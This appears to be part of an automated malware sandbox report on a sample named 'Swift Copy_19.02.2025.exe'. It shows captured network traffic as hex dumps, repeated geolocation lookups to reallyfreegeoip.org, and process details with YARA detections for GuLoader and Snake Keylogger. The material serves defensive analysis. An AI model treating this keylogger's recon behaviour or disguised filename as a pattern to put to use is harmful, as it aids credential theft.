                                                                              2025-02-21 07:22:27 UTC1390INData Raw: c2 14 84 bf 42 17 8a 4d e6 af 65 97 c4 e1 70 14 31 9b 3c de 38 ac ea 00 af 44 5b fe f3 fc 3c 76 34 2b 33 fe b4 31 23 80 82 c0 c7 b7 71 93 99 f7 28 fc 40 fd f3 88 22 d4 43 0a 6c 60 ff 36 72 56 e3 5b 93 a4 3f 8e 38 f6 36 52 d5 2d f6 b8 6d 86 9a b4 98 44 4b 09 f3 40 ca 87 52 2e 8b 92 88 0d 65 e0 a7 11 09 8e 33 bf 22 1b f2 e2 3a 8c e0 04 dd 37 fe 3c 74 c5 1e 92 ed 0a ff e5 01 7d 21 2a 90 05 60 8f 60 73 5e b9 6a 5b bb 06 16 11 9c 0f 89 b9 1e 98 ab d8 e0 8f 49 7f ee 6d 22 b2 65 d2 e0 f6 f0 dc 47 8a b8 d1 19 e0 5a 89 7f 39 76 28 be da c7 80 24 ce 61 d6 28 06 a5 08 23 35 e5 31 d7 2c a9 f0 3b 7b 03 91 6b 79 af 5c 81 a7 03 6d b2 16 79 10 7d d2 e4 23 ca a8 90 eb 68 e8 b1 5e 13 ee 53 8f 23 4a 60 97 80 78 6d ad 5f 48 f3 30 c1 7f 06 cf 3c 8f 9c 34 14 3f a4 bc f5 20 10
                                                                              Data Ascii: BMep1<8D[<v4+31#q(@"Cl`6rV[?86R-mDK@R.e3":7<t}!*``s^j[Im"eGZ9v($a(#51,;{ky\my}#h^S#J`xm_H0<4?
                                                                              2025-02-21 07:22:27 UTC1390INData Raw: ba 0c df 3e 2c 07 41 81 53 4e 82 71 35 bd b9 2c 19 89 11 a1 ab d2 92 bf f3 34 29 52 97 61 70 db 0a ea a4 9f 03 18 31 6d fa 3e 1b c8 30 71 b7 81 5f 7f cb 2a 50 93 51 3a 20 2f a9 05 22 66 40 50 79 f6 6b 15 41 48 6e 21 11 d4 48 2e 01 c4 d3 d1 37 87 7f a2 c0 be d4 ab 70 27 56 3b 90 fa 08 52 b7 5e f2 d5 22 56 4d a8 fc 12 88 7c 53 b3 f0 ce 5a 50 6b 92 e6 9d b9 65 2d 30 6a d8 f7 06 28 45 76 1d 21 c2 f8 a6 10 2a f3 f4 a9 40 f5 f3 0c 18 f2 54 ba 9a e2 36 5d b9 b6 db 5c 94 1c 4d 69 58 60 9e c5 87 c6 8d 94 4c 49 3f 7d b3 2c d8 fb 48 a7 ac 97 56 b8 56 de c9 69 9c 28 a0 84 a7 69 65 15 7d 9f 70 74 1f 66 d6 f6 e9 f8 51 4d 8a f2 5a e1 96 f5 38 b5 3a 6a 56 1b 3b c1 19 34 ce 6e e0 be b8 3a 79 65 e8 25 89 07 0e de a1 b1 a2 05 49 69 39 0a 66 13 a2 21 07 c1 c7 d0 bf 6a 7f 0f
                                                                              Data Ascii: >,ASNq5,4)Rap1m>0q_*PQ: /"f@PykAHn!H.7p'V;R^"VM|SZPke-0j(Ev!*@T6]\MiX`LI?},HVVi(ie}ptfQMZ8:jV;4n:ye%Ii9f!j
                                                                              2025-02-21 07:22:27 UTC1390INData Raw: 9a 1d 73 a3 1c 1f 76 87 42 05 c1 c9 26 bf 71 41 f5 d4 a8 1d e2 49 3b 32 20 0f a4 9d 7e 88 22 12 93 c3 0c 71 1e a6 fc 06 fc 1b 51 86 f6 cb c8 8c 9c a4 cc 5a 8a 7c 04 80 54 66 fa 9e 66 89 c7 6a fa e9 ae f7 91 24 d8 51 36 1e cb e2 88 cf 2e a5 36 a7 3d f5 c5 e6 2d cf b8 24 15 a0 01 e3 9c b2 fb 62 18 ee cf 92 3d 95 1e 75 cd 4c b3 7b 49 c5 6c e2 c1 4c b7 b7 35 c6 54 2c 24 d5 de 19 18 dc 73 6c c6 30 fc 8b a7 c2 8a 3a 69 24 b4 bc 89 c2 5a 7e 51 2e e7 92 76 ef fd 5e ce 31 57 78 75 6b a7 3d 65 b1 90 8a 68 a5 fb 21 62 8c 07 61 a8 1d 83 e1 43 db 86 8f 36 34 3b c6 a9 e7 f1 c2 57 e4 d4 ff 5f b5 39 c0 03 c8 79 9c 68 06 80 2c fc 2b 74 df a8 81 46 df 10 f7 4b 01 f9 74 0c 0e 63 10 5f bc 43 5b b7 0f f9 06 3f be 7e ba 65 9f 42 8b 97 ab d8 0a 6c 14 29 44 2d da 23 0e 33 11 84
                                                                              Data Ascii: svB&qAI;2 ~"qQZ|Tffj$Q6.6=-$b=uL{IlL5T,$sl0:i$Z~Q.v^1Wxuk=eh!baC64;W_9yh,+tFKtc_C[?~eBl)D-#3
                                                                              2025-02-21 07:22:27 UTC1390INData Raw: 06 71 0f 55 6c f1 87 53 3d 6f ff a7 0f 68 80 86 9f 02 3a e9 8c 3e cd 08 b7 6c 6a 23 ea 09 55 f8 9c c0 62 88 90 39 13 b4 d8 6b b5 00 3e 53 e2 af 59 c8 57 ad 95 c3 9f 04 0e d7 2f 92 2e 5c d8 18 c8 7d 06 8a c3 7f 55 e9 58 69 d8 fc 17 48 75 9b d7 53 5e fc fc 84 34 2c ae f2 48 31 bb 1c 09 31 bd 6f 18 6a 5e ca d4 f8 5c 6a 2b fa 0a 78 58 ac 67 ca 97 35 d2 16 dc b4 84 7d 27 d3 14 1e 79 b5 5c e3 7f 2f dd d6 19 9d 5a 95 de a0 49 39 d3 d1 0a ee 37 3d b7 83 aa 02 e8 1f 4f 7e 46 cc c3 4b 20 45 37 4a 1d 0f 63 49 95 b5 41 2b 6c b5 0e bd 78 55 57 f8 1b f9 1c 8c a5 9e 87 a9 20 f8 28 37 32 f7 b7 8e d5 6b 4b 4a 0b 20 e4 94 58 fe 66 dd 0d 79 db d7 de 87 49 59 21 0f b6 b1 58 6d 20 ed e9 19 9e 6f 8e 44 49 ce db 7f 3a 50 bc 46 52 ab 99 f6 d9 67 53 16 d0 48 7f 7a cf fc d5 0e 16
                                                                              Data Ascii: qUlS=oh:>lj#Ub9k>SYW/.\}UXiHuS^4,H11oj^\j+xXg5}'y\/ZI97=O~FK E7JcIA+lxUW (72kKJ XfyIY!Xm oDI:PFRgSHz
                                                                              2025-02-21 07:22:27 UTC1390INData Raw: f8 da a3 46 51 87 c7 27 28 20 ca 76 9f d1 ea 14 69 13 73 c8 b9 fe 3e 12 b9 06 d7 23 f5 93 d8 53 cc 68 47 18 7c fa d7 4d f2 3d 08 a7 73 1d 1b c4 a3 79 af 2b d2 d9 2f 3b 77 60 92 8e ec aa f2 8c e6 c2 8d e6 00 67 8e f7 6b 4b 1a 16 be 0c 0c 80 77 f3 55 f9 3f 59 0c 28 32 77 df 49 e8 54 5b 3d 23 d4 67 34 51 9b af 8e 25 b7 d8 29 bb 51 12 61 f4 34 61 03 78 90 f3 d4 fb ea 0d 90 9c 23 59 ac 9a af d5 39 e1 9b 5b e9 ee 3f 1f f0 cc 3e 47 51 93 db 5a 72 31 a5 59 54 32 c3 b6 05 b0 e0 4a e6 fd ae 03 28 ba 58 a8 83 2d 53 3a 72 19 a3 4b 94 32 12 10 96 84 13 8d 50 26 03 84 77 47 d3 50 5d 0c c9 a8 4c 1a 6d d8 50 17 bb 34 08 bc ec 8f c4 88 cc 83 3f d7 7b 75 1d 38 9a de 3b 79 38 29 c8 fd 7f 56 14 1c 12 c1 73 c8 5b 13 f2 36 8f 7b 6a 65 32 40 ac 45 a7 ad 6e 9b 27 ee 02 bf 59 90
                                                                              Data Ascii: FQ'( vis>#ShG|M=sy+/;w`gkKwU?Y(2wIT[=#g4Q%)Qa4ax#Y9[?>GQZr1YT2J(X-S:rK2P&wGP]LmP4?{u8;y8)Vs[6{je2@En'Y


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              2192.168.2.749975104.21.64.1443720C:\Users\user\Desktop\Swift Copy_19.02.2025.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-02-21 07:22:30 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                              Host: reallyfreegeoip.org
                                                                              Connection: Keep-Alive
                                                                              2025-02-21 07:22:30 UTC850INHTTP/1.1 200 OK
                                                                              Date: Fri, 21 Feb 2025 07:22:30 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 362
                                                                              Connection: close
                                                                              Age: 354319
                                                                              Cache-Control: max-age=31536000
                                                                              cf-cache-status: HIT
                                                                              last-modified: Mon, 17 Feb 2025 04:57:11 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v1r4DITTfK%2BCyen26VNmO0QWI2kd1jLybsKRRAZfZrEHNeA6eDFYPbgYgx3JmfABZkdhsfbgJEAJmANbpq9YIQtMFoP8eZuQdxa1Ni3MMFE22TS5zX6TPzlgKBopj1iky6HXxHAd"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 9154fc54abd24414-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1698&min_rtt=1687&rtt_var=656&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1640449&cwnd=181&unsent_bytes=0&cid=f01abf10fe096308&ts=144&x=0"
                                                                              2025-02-21 07:22:30 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              3192.168.2.749976104.21.64.1443720C:\Users\user\Desktop\Swift Copy_19.02.2025.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-02-21 07:22:31 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                              Host: reallyfreegeoip.org
                                                                              2025-02-21 07:22:31 UTC858INHTTP/1.1 200 OK
                                                                              Date: Fri, 21 Feb 2025 07:22:31 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 362
                                                                              Connection: close
                                                                              Age: 354320
                                                                              Cache-Control: max-age=31536000
                                                                              cf-cache-status: HIT
                                                                              last-modified: Mon, 17 Feb 2025 04:57:11 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YzFywwT%2BUpEC99I64Uw%2Fo5PMxR9fwyUCfmmJG%2B%2F%2B96JrSptdUOjQSEO1IzmYlX5xywCf8zfgQrfxqP7dTXAKlWgPs7RqiIBOueYDUBY4vutt8x4GCE1EiMJ2MksJfm1wbr5LB1f0"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 9154fc5cfadb4414-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1896&min_rtt=1893&rtt_var=716&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1522419&cwnd=181&unsent_bytes=0&cid=cffb4585b7ba8e33&ts=633&x=0"
                                                                              2025-02-21 07:22:31 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              4192.168.2.749978104.21.64.1443720C:\Users\user\Desktop\Swift Copy_19.02.2025.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-02-21 07:22:33 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                              Host: reallyfreegeoip.org
                                                                              Connection: Keep-Alive
                                                                              2025-02-21 07:22:33 UTC866INHTTP/1.1 200 OK
                                                                              Date: Fri, 21 Feb 2025 07:22:33 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 362
                                                                              Connection: close
                                                                              Age: 354321
                                                                              Cache-Control: max-age=31536000
                                                                              cf-cache-status: HIT
                                                                              last-modified: Mon, 17 Feb 2025 04:57:11 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sCD%2B%2Bbw9I2%2FYzU%2FxZ7wA%2FcJBGdsRU03qsQjQIe%2BePF9umFA%2BzHKbJi%2BneoRou7iaanUcAgAyILvSSFo0zVh5oMQaDdyJfEt8ZeA13Qk%2FXC7ig5347ZDqsNCq0Aaxc4SsvjOYDngW"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 9154fc667e4b42e9-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1959&min_rtt=1780&rtt_var=795&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1640449&cwnd=246&unsent_bytes=0&cid=cc3deeceb46b88ee&ts=149&x=0"
                                                                              2025-02-21 07:22:33 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              5192.168.2.749980104.21.64.1443720C:\Users\user\Desktop\Swift Copy_19.02.2025.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-02-21 07:22:37 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                              Host: reallyfreegeoip.org
                                                                              Connection: Keep-Alive
                                                                              2025-02-21 07:22:37 UTC853INHTTP/1.1 200 OK
                                                                              Date: Fri, 21 Feb 2025 07:22:37 GMT
                                                                              Content-Type: text/xml
                                                                              Content-Length: 362
                                                                              Connection: close
                                                                              Age: 354325
                                                                              Cache-Control: max-age=31536000
                                                                              cf-cache-status: HIT
                                                                              last-modified: Mon, 17 Feb 2025 04:57:11 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xCB1hgmm6dBjdZawjXD3c%2BrzheWUIUMI5rO5F7R2uVunWluGHukANyminza5O2tS6R%2FpHYRwOmsxSGq89KUTr1D1BOujKfenL1aoH4yE7VqnRNXk3UtxYxZMxzsrMqaII6p0r6XL"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 9154fc7dcb6cc358-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1998&min_rtt=1956&rtt_var=763&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1492842&cwnd=155&unsent_bytes=0&cid=d7ac2d367466eb89&ts=2558&x=0"
                                                                              2025-02-21 07:22:37 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                              Click to jump to process

                                                                              Click to jump to process

                                                                              Click to dive into process behavior distribution

                                                                              Click to jump to process

                                                                              Target ID:0
                                                                              Start time:02:20:27
                                                                              Start date:21/02/2025
                                                                              Path:C:\Users\user\Desktop\Swift Copy_19.02.2025.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\Swift Copy_19.02.2025.exe"
                                                                              Imagebase:0x400000
                                                                              File size:693'604 bytes
                                                                              MD5 hash:CFD2A2A0DE8C10180319835F2C148578
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2371134333.0000000004638000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:6
                                                                              Start time:03:42:46
                                                                              Start date:21/02/2025
                                                                              Path:C:\Users\user\Desktop\Swift Copy_19.02.2025.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\Swift Copy_19.02.2025.exe"
                                                                              Imagebase:0x400000
                                                                              File size:693'604 bytes
                                                                              MD5 hash:CFD2A2A0DE8C10180319835F2C148578
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.2583953179.0000000034731000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.2559828926.0000000002CB8000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:low
                                                                              Has exited:false

                                                                              Reset < >